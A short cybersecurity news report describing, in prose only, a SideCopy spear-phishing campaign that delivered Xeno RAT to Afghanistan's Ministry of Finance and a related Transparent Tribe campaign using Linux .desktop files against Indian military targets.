- The Pakistan-aligned SideCopy group deployed a sophisticated spear-phishing campaign codenamed Operation XENOFISCAL against Afghanistan’s Ministry of Finance.
- The attackers used a malicious ZIP archive containing a Pashto-language LNK file to deliver the open-source remote access trojan Xeno RAT, establishing persistent control.
- In a related campaign, the broader Transparent Tribe (APT36) umbrella targeted Indian military infrastructure using weaponized Linux .desktop files and a Golang-based implant called DeskRAT.
In early June 2026, cybersecurity researchers uncovered a targeted cyber espionage campaign by the Pakistan-aligned SideCopy group, which successfully compromised Afghanistan’s Ministry of Finance using a sophisticated remote access trojan. The attack, detailed by Seqrite Labs researcher Dixit Panchal, deployed a persistent version of the open-source Xeno RAT malware against Afghan government officials.
“The campaign opens with a spear phishing delivery – a ZIP archive containing a malicious LNK file bearing a carefully crafted Pashto-language filename,” Panchal said in a technical breakdown. This deliberate linguistic choice reflected the attackers’ deep familiarity with their target environment within Afghan government circles.
Consequently, the malicious Windows Shortcut file fetched a remote HTML Application from a compromised education domain to execute obfuscated JavaScript. The malware then established persistence by mimicking Microsoft Edge in the Registry before dropping the final Xeno RAT payload alongside a decoy document.
The remote access trojan is equipped with extensive capabilities, including executing commands, logging keystrokes, taking screenshots, and performing network tunneling. Meanwhile, a separate but related phishing operation leveraging weaponized Linux .desktop files targeted Indian military infrastructure, according to security researcher R.D. Tarun.
This broader campaign, assessed to be the work of Transparent Tribe, used contract-related lures associated with Indian-armored vehicle procurement. “The campaign appears to target individuals connected to Indian military and defense infrastructure ecosystems using WhatsApp-based social engineering,” Tarun noted in a recent report.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
